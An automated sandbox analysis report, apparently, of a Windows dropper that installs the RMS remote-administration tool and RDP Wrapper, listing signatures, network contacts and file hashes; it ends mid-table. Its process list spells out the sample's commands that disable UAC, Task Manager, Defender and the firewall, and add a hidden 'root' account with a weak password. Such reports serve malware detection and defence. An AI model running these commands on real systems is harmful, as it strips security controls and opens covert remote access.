Analysis Overview
SHA256
c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6
Threat Level: Known bad
The file c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6 was found to be: Known bad.
Malicious Activity Summary
UAC bypass
RMS
ACProtect 1.3x - 1.4x DLL software
Disables Task Manager via registry modification
UPX packed file
Executes dropped EXE
Sets file to hidden
Sets DLL path for service in the registry
Modifies Windows Firewall
Checks computer location settings
Loads dropped DLL
Modifies WinLogon
Checks installed software on the system
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: SetClipboardViewer
Suspicious behavior: LoadsDriver
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Runs net.exe
Delays execution with timeout.exe
Views/modifies file attributes
Enumerates processes with tasklist
Runs .reg file with regedit
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-02-08 16:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-02-08 16:54
Reported
2022-02-08 18:41
Platform
win7-en-20211208
Max time kernel
160s
Max time network
186s
Command Line
Signatures
RMS
UAC bypass
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\task.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Modifies Windows Firewall
Sets DLL path for service in the registry
Sets file to hidden
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
Checks installed software on the system
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary blob value omitted] | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary blob value omitted] | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary blob value omitted] | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe
"C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe"
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
"C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RMS\setup.bat" "
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\find.exe
find "rutserv.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im systemp.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im igfxtraise.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im RMS.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
RDP.exe
C:\ProgramData\RDP\run.exe
"C:\ProgramData\RDP\run.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\RDP\run.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
uac.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9C6E.tmp\9C9E.bat C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe"
C:\Windows\system32\cmd.exe
Cmd /k Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
C:\Windows\system32\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
task.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A535.tmp\A536.bat C:\Users\Admin\AppData\Local\Temp\RMS\task.exe"
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
defender.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A5E0.tmp\A5E1.bat C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe"
C:\Windows\system32\net.exe
net stop "WinDefend"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
firewall.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AD9D.tmp\AD9E.bat C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe"
C:\Windows\system32\net.exe
net stop "MpsSvc"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MpsSvc"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "FirewallControlPanel.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /silentinstall
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\net.exe
net user root /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user root /add
C:\Windows\SysWOW64\net.exe
net localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /start
C:\Windows\SysWOW64\net.exe
net user root 12345
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user root 12345
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
C:\ProgramData\RDP\RDPWInst.exe
"C:\ProgramData\RDP\RDPWInst.exe" -i -o
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe /tray
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Local\Temp\RMS" /S /D
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Local\Temp" /S /D
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RMS\remsetup.bat" "
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe /tray
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\ProgramData\RDP\RDPWInst.exe
"C:\ProgramData\RDP\RDPWInst.exe" -w
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rmansys.ru | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
Files
memory/1668-54-0x0000000075B51000-0x0000000075B53000-memory.dmp
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
C:\Users\Admin\AppData\Local\Temp\RMS\setup.bat
| MD5 | 29e13072fa219a53afa88d84ffc17903 |
| SHA1 | e0d2a5ea26982260471588775dceb3a60b3a2d01 |
| SHA256 | d9ca40913b5a976f4b7e07ed83adc217c94730f60ab7e9307d8a5ba4d287387b |
| SHA512 | 314449c87df12cfc4d770ff72f5816eadc5336503104480ec0482aa1918be1730a3d3a580dd1c17669c55d473de4e5df6d035ef8e32e0f8326eac8bf58f0b120 |
\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
| MD5 | 432ffc627865aa735aace14cd8a59b30 |
| SHA1 | fe3b916cedbdc4b0293c49378659cc2c4e68be7d |
| SHA256 | 01ac35a35fa0fa9eee05dfe8e12a7625e81904c69d853bdf999c4e95538e6b27 |
| SHA512 | e4fd5a0b08aa2321d06d578012ac1b0e7e53b06920ae75d6d8d5091fc10b3cdcd2c468eda3cfd0092107d0c9af042894f2f1b8e32255e6a11954a1e65e860f78 |
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
| MD5 | 432ffc627865aa735aace14cd8a59b30 |
| SHA1 | fe3b916cedbdc4b0293c49378659cc2c4e68be7d |
| SHA256 | 01ac35a35fa0fa9eee05dfe8e12a7625e81904c69d853bdf999c4e95538e6b27 |
| SHA512 | e4fd5a0b08aa2321d06d578012ac1b0e7e53b06920ae75d6d8d5091fc10b3cdcd2c468eda3cfd0092107d0c9af042894f2f1b8e32255e6a11954a1e65e860f78 |
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
| MD5 | 432ffc627865aa735aace14cd8a59b30 |
| SHA1 | fe3b916cedbdc4b0293c49378659cc2c4e68be7d |
| SHA256 | 01ac35a35fa0fa9eee05dfe8e12a7625e81904c69d853bdf999c4e95538e6b27 |
| SHA512 | e4fd5a0b08aa2321d06d578012ac1b0e7e53b06920ae75d6d8d5091fc10b3cdcd2c468eda3cfd0092107d0c9af042894f2f1b8e32255e6a11954a1e65e860f78 |
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 8708699d2c73bed30a0a08d80f96d6d7 |
| SHA1 | 684cb9d317146553e8c5269c8afb1539565f4f78 |
| SHA256 | a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f |
| SHA512 | 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264 |
\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
C:\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
C:\ProgramData\RDP\run.bat
| MD5 | 4e6a1033e3c2f39db397d392fe0d7c77 |
| SHA1 | 11526234cd216334902d51665529c2b9be7acc05 |
| SHA256 | 2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4 |
| SHA512 | 395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb |
\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
C:\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
memory/548-75-0x0000000000340000-0x0000000000341000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\regedit.reg
| MD5 | aae4fbd269f5d65a222f2db994b1c6e3 |
| SHA1 | cb4dafc589459b6eb1e69dd17e1718e8ac0b3f72 |
| SHA256 | e8ba276486dd6a256dbc0865c74521e8d3e26c735806c695c5c386f82663441c |
| SHA512 | e5660a4c8df0faf0db2dda9c09d18b606a97f4687ad9d4fe03fac39cf608adac21529fffa2f595a701ecde88d43d10390cdfbea2e9e6b9d7931e47f8254d0b71 |
\Users\Admin\AppData\Local\Temp\RMS\uac.exe
| MD5 | 84149257a74fae3b2922fb79e181fee2 |
| SHA1 | f0cbb804568971a8b990f01f8d07297c05fc44c0 |
| SHA256 | 4212603874d5211ba80331e24fd223a1788523d6a454b9aef3df8edc0a7d31bf |
| SHA512 | be90490ba50717b3b0a0f4bceee71c773add208b58d72d088cd6da59607fe7a8d4f3ccc676b14c3bd4aa8e056fa1cb9dff81f004a6789d9c2a1be6f6c655696c |
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
| MD5 | 84149257a74fae3b2922fb79e181fee2 |
| SHA1 | f0cbb804568971a8b990f01f8d07297c05fc44c0 |
| SHA256 | 4212603874d5211ba80331e24fd223a1788523d6a454b9aef3df8edc0a7d31bf |
| SHA512 | be90490ba50717b3b0a0f4bceee71c773add208b58d72d088cd6da59607fe7a8d4f3ccc676b14c3bd4aa8e056fa1cb9dff81f004a6789d9c2a1be6f6c655696c |
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
| MD5 | 84149257a74fae3b2922fb79e181fee2 |
| SHA1 | f0cbb804568971a8b990f01f8d07297c05fc44c0 |
| SHA256 | 4212603874d5211ba80331e24fd223a1788523d6a454b9aef3df8edc0a7d31bf |
| SHA512 | be90490ba50717b3b0a0f4bceee71c773add208b58d72d088cd6da59607fe7a8d4f3ccc676b14c3bd4aa8e056fa1cb9dff81f004a6789d9c2a1be6f6c655696c |
C:\Users\Admin\AppData\Local\Temp\9C6E.tmp\9C9E.bat
| MD5 | 41bd62ba30ba68ec4e214aafabf25804 |
| SHA1 | fd45aed5758f99872e130e60635f2acef76645e8 |
| SHA256 | e4a4aae0922f7dd92cf300fb6add8f3141101ac281d88de8514deb14af2c0af0 |
| SHA512 | 0b382d7ed4a40cfea9d5097c1ce41960323732c1892293f6c85263030493e0b01add165373ec8a83d11fd4562027552b69a4eea6d2f5791278d8f390ff37f63e |
\Users\Admin\AppData\Local\Temp\RMS\task.exe
| MD5 | b7d30e5c315855dde61bf985ef00ebe4 |
| SHA1 | 28c5edcd97e0e7338bc794174b3bfa3e4cbf5867 |
| SHA256 | f995083a06ac84ba368846278b44d5f91cde0b7f09f4adbabd91fcdffa395165 |
| SHA512 | 7519654a477a55ea282b5a0f384d9bbf6ea11c525260954c9fea6b188bf10c371a9266da3d95cb1d363921c6a207db4a45ba9242d7a1570b2cc3c3523fa1bc90 |
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
| MD5 | b7d30e5c315855dde61bf985ef00ebe4 |
| SHA1 | 28c5edcd97e0e7338bc794174b3bfa3e4cbf5867 |
| SHA256 | f995083a06ac84ba368846278b44d5f91cde0b7f09f4adbabd91fcdffa395165 |
| SHA512 | 7519654a477a55ea282b5a0f384d9bbf6ea11c525260954c9fea6b188bf10c371a9266da3d95cb1d363921c6a207db4a45ba9242d7a1570b2cc3c3523fa1bc90 |
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
| MD5 | b7d30e5c315855dde61bf985ef00ebe4 |
| SHA1 | 28c5edcd97e0e7338bc794174b3bfa3e4cbf5867 |
| SHA256 | f995083a06ac84ba368846278b44d5f91cde0b7f09f4adbabd91fcdffa395165 |
| SHA512 | 7519654a477a55ea282b5a0f384d9bbf6ea11c525260954c9fea6b188bf10c371a9266da3d95cb1d363921c6a207db4a45ba9242d7a1570b2cc3c3523fa1bc90 |
C:\Users\Admin\AppData\Local\Temp\A535.tmp\A536.bat
| MD5 | 973b0c9d6042bbdd0d78547bcc6bf036 |
| SHA1 | 2c352764d8410f19fc14f1a95db17e744ee55723 |
| SHA256 | 187bacda7879e31e4f29a027392a4e4fea81bfc2f86abd48c3079ff969c82797 |
| SHA512 | 8e5ee11a935e902b4d282a3057229535615571e2360e7e73b513fff7dfee34a9e30b1858b9e0d9790bf8e15f92607a46e9a81a1bba6122f4976aa0a77ec8b2b4 |
\Users\Admin\AppData\Local\Temp\RMS\defender.exe
| MD5 | b8a928d6df0741b9a2ee7b678a27f817 |
| SHA1 | c61fc60feb264be97628b4bad0633c31da987076 |
| SHA256 | 73e0dc6d8451996737727f9167a8e2a6924461c3d076d6f5506946393be9e3dc |
| SHA512 | afe353f3845675f31843e5e2ecf7d81586e52ea3b6d91107b4e2e703c34d8f28222fdb007f31893b3c833f532053ee30d50e8e10665734a5706029f7eba67c24 |
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
| MD5 | b8a928d6df0741b9a2ee7b678a27f817 |
| SHA1 | c61fc60feb264be97628b4bad0633c31da987076 |
| SHA256 | 73e0dc6d8451996737727f9167a8e2a6924461c3d076d6f5506946393be9e3dc |
